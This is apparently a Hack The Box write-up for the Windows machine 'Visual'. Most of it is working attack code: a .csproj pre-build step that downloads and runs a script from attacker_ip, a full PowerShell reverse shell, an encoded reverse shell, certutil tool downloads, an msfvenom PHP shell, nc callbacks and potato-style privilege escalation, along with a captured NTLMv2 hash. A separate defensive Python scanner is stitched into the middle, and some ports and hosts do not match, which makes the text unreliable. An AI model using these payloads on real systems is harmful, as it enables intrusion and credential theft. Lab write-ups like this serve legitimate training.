Visual - Medium HTB

  • OS: Windows
  • Difficulty: Medium
  • Author: 4nh4ck1ne

Scanning:

Basic nmap scan: nmap -sW -sC -sV -T4 -Pn target_ip

80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
| http-enum:
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.56 (win64) openssl/1.1.1t php/8.1.17'
|   /icons/: Potentially interesting folder w/ directory listing
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.56 (win64) openssl/1.1.1t php/8.1.17'

Enumeration:

Directory enumeration to find interesting pages: gobuster dir -u http://target_ip/ -w /usr/share/wordlists/dirb/big.txt -t50

/uploads              (Status: 301) [Size: 343] [--> http://10.129.157.242/uploads/]
/submit.php           (Status: 200) [Size: 0]
/assets               (Status: 301) [Size: 342] [--> http://10.129.157.242/assets/]
/css                  (Status: 301) [Size: 339] [--> http://10.129.157.242/css/]
/Index.php            (Status: 200) [Size: 7534]
/js                   (Status: 301) [Size: 338] [--> http://10.129.157.242/js/]

Exploit:

Create a Visual Studio console project: dotnet new console -n exploit -f net6.0

Create the .sln file: dotnet new sln --name exploit

Add the project to the .sln: dotnet sln add ../exploit

Create the git repository in the same directory:

git init

git add .

# give permissive file permissions
chmod 777 *

# first commit
git commit -m "update"

# write the server info files so the repository can be served over plain HTTP
git update-server-info

Run the Python web server:

python3 -m http.server 80

On the web app, enter your server address so it compiles the project:

This .csproj works to execute a PowerShell reverse shell from a pre-build target:

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell IEX (New-Object System.Net.WebClient).DownloadString('http://attacker_ip/reverse.ps1')" />
  </Target>

</Project>
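As an added defensive example (not code from the post or the box), a scanner for the build-time command execution that the .csproj above relies on: it lists every Exec task and legacy PreBuildEvent/PostBuildEvent property that MSBuild would run, and flags download-and-execute indicators so a build service that compiles external repositories can reject them. The sample project text is constructed after the one above; the indicator list and the function names are my own assumptions.

```python
import xml.etree.ElementTree as ET

# Substrings in a build-time command that usually mean download-and-execute or a spawned shell.
SUSPICIOUS = ("downloadstring", "downloadfile", "iex ", "invoke-expression",
              "certutil", "powershell", "bitsadmin", "curl ", "wget ")

# Constructed sample modeled on the .csproj above (not the box's own project file).
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell IEX (New-Object System.Net.WebClient).DownloadString('http://attacker_ip/reverse.ps1')" />
  </Target>
</Project>"""

def _local(tag):
    """Strip the XML namespace ({ns}Name -> Name); old-style projects declare one."""
    return tag.rsplit("}", 1)[-1]

def _classify(target, hook, command):
    """Attach the suspicious indicators found in one build command."""
    lowered = command.lower()
    hits = [s.strip() for s in SUSPICIOUS if s in lowered]
    return {"target": target, "hook": hook, "command": command, "indicators": hits}

def find_build_commands(csproj_text):
    """Return every command MSBuild would run at build time and the hook it hangs on.

    Covers <Exec> tasks inside <Target> (as in the project above) and the legacy
    <PreBuildEvent>/<PostBuildEvent> properties, which MSBuild also runs through Exec."""
    root = ET.fromstring(csproj_text)
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name == "Target":
            hook = elem.get("BeforeTargets") or elem.get("AfterTargets") or "(explicit)"
            for task in elem.iter():
                if _local(task.tag) == "Exec":
                    findings.append(_classify(elem.get("Name", "?"), hook, task.get("Command", "")))
        elif name in ("PreBuildEvent", "PostBuildEvent") and (elem.text or "").strip():
            findings.append(_classify(name, name, elem.text.strip()))
    return findings

def is_unsafe_project(csproj_text):
    """True if any build-time command carries a download/execute indicator; reject such repos."""
    return any(f["indicators"] for f in find_build_commands(csproj_text))
```

Run it over every .csproj, .targets and .props file in a submitted repository, since imported files can carry targets too.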

The PowerShell reverse shell (reverse.ps1):

do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1

    # Connect to C2
    try{
        $TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.2', 13337)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client receive buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the initial empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    
    # Execute command and save output (including errors thrown)
    $Output = try {
            Invoke-Expression $Command 2>&1 | Out-String
        } catch {
            $_ | Out-String
        }

    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

Don't forget to initialise the git repository and run your web server!

Run your listener: nc -lnvp 4444

Enter the repository URL in the web app and BIIM, enjoy your reverse shell and the user flag! 😎

Privilege escalation:

Switch to another shell:

powershell -e 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

# run your nc listener
nc -lnvp 5555

Let's run winPEAS.

Download the .exe:

certutil -urlcache -f http://10.10.16.2:800/winPEASany.exe winPEASany.exe

NTLMv2 hash of the user enox:

╔══════════╣ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    enox::VISUAL:1122334455667788:53aecbcd1a9c0b3231498b11c48ca12f:0101000000000000f29a317c1f13da011fb6ad2ff4bc475b0000000008003000300000000000000000000000003000002c785e2b78af2f96d3c944421407d60a2362308bb18673f3b05785a57ad49de60a00100000000000000000000000000000000000090000000000000000000000

Potential DLL hijacking:

╔══════════╣ Interesting Services -non Microsoft-
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    ApacheHTTPServer(Apache Software Foundation - Apache HTTP Server)["C:\Xampp\apache\bin\httpd.exe" -k runservice] - Auto - Running
    File Permissions: Everyone [AllAccess]
    Possible DLL Hijacking in binary folder: C:\Xampp\apache\bin (Everyone [AllAccess], Users [AppendData/CreateDirectories WriteData/CreateFiles])
    Apache/2.4.56 (Win64)

winPEAS tells us that Everyone has full access to C:\Xampp, so upload a PHP reverse shell into the web server's document root, since it is writable:

# create the reverse .php
msfvenom -p php/reverse_php LHOST=10.10.16.2 LPORT=9001 -o shell.php

# download it into the web directory
cd C:\xampp\htdocs
certutil -urlcache -f http://10.10.16.2:800/shell.php shell.php

# launch a listener
nc -lnvp 9001

whoami
nt authority\local service

# switch to a better shell on port 4447
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

We now have a shell as a service account (NT AUTHORITY\LOCAL SERVICE), but with a restricted set of privileges; FullPowers.exe can be used to recover the account's default privileges:

# download the executable from https://github.com/itm4n/FullPowers
certutil -urlcache -f http://10.10.16.2:800/FullPowers.exe FullPowers.exe

# download nc.exe
certutil -urlcache -f http://10.10.16.2:800/nc.exe nc.exe

# launch a listener
nc -lnvp 4445

# run
./FullPowers.exe -c "C:\tmp\nc.exe 10.10.16.2 4446 -e cmd" -z
[+] Started dummy thread with id 4928
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK

View the new privileges on the system:

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

OK, you can try token impersonation with PrintSpoofer.exe, but for me that didn't work:

# download the executable
certutil -urlcache -f http://10.10.16.2:800/PrintSpoofer.exe PrintSpoofer.exe

# run and enjoy your Admin access!
PrintSpoofer.exe -c "C:\tmp\nc.exe 10.10.16.2 4443 -e cmd"

An alternative that worked for me is GodPotato:

certutil -urlcache -f http://10.10.16.2:800/GodPotato-NET4.exe godpotato.exe

# read the admin flag
godpotato.exe -cmd "cmd /c more C:\Users\Administrator\Desktop\root.txt"

You're Admin now, congrats! 😼

This post is licensed under CC BY 4.0 by the author.